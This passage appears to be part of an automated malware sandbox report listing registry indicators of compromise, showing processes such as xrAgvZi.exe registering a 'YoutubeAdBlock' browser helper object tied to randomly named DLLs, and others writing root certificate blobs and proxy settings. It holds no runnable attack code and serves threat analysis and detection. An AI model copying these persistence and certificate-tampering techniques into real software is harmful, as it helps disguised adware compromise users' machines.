\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-422 = "Russian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" windefender.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a07005a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs ww31.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" setup.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My ww31.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" windefender.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3} xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Programmable xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories\ xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9} xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{949304BF-B0CB-4477-AB23-4FFC82B86902}\1.0\0\win32 xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib\ = "{949304BF-B0CB-4477-AB23-4FFC82B86902}" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\0\win32\ = "C:\\Program Files (x86)\\yjiDqdgnMIE\\tDF90DJ.dll" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Programmable\ xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\InprocServer32 xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\ProgID = "Toolbar.ExtensionHelperObject.1" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid32 xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\0\win32\ = "C:\\Program Files (x86)\\yjiDqdgnMIE\\kVLys0L.dll" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Programmable xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\LocalServer32 xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Programmable\ xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\ xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\FLAGS\ = "0" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\HELPDIR xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\ProgID = "Toolbar.ExtensionHelperObject.1" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib\ = "{949304BF-B0CB-4477-AB23-4FFC82B86902}" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib\Version = "1.0" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\0 xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\InprocServer32\ = "C:\\Program Files (x86)\\yjiDqdgnMIE\\tDF90DJ.dll" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{949304BF-B0CB-4477-AB23-4FFC82B86902}\1.0\0\win32\ = "C:\\Program Files (x86)\\yjiDqdgnMIE\\Ofdryfq.exe" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\ProxyStubClsid32 xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\InprocServer32\ThreadingModel = "Apartment" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\FLAGS xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\ = "YoutubeAdBlock" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640} xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\InprocServer32\ThreadingModel = "Apartment" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\ = "BackgroundScriptEngine Class" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories\ xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib\Version = "1.0" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib\Version = "1.0" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\ = "_yTzzTASZltobXVPmMycLdyoOIK" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\ProxyStubClsid32 xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\ = "YoutubeAdBlock" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{949304BF-B0CB-4477-AB23-4FFC82B86902}\1.0\0 xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\ = "IfKXvimzPBAqDVIyErDp" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib\Version = "1.0" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\ = "IfKXvimzPBAqDVIyErDp" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\InprocServer32\ = "C:\\Program Files (x86)\\yjiDqdgnMIE\\kVLys0L.dll" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ = "{FCD323B9-9E05-4433-8305-22E34A2FA3B9}" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\ = "{484C7844-4212-4BE0-A3B4-376E9752EB97}" xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668} xrAgvZi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Programmable xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Programmable\ xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\TypeLib\ = "{484C7844-4212-4BE0-A3B4-376E9752EB97}" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib\ = "{949304BF-B0CB-4477-AB23-4FFC82B86902}" xrAgvZi.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd HGT.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a gaooo.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a gaooo.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 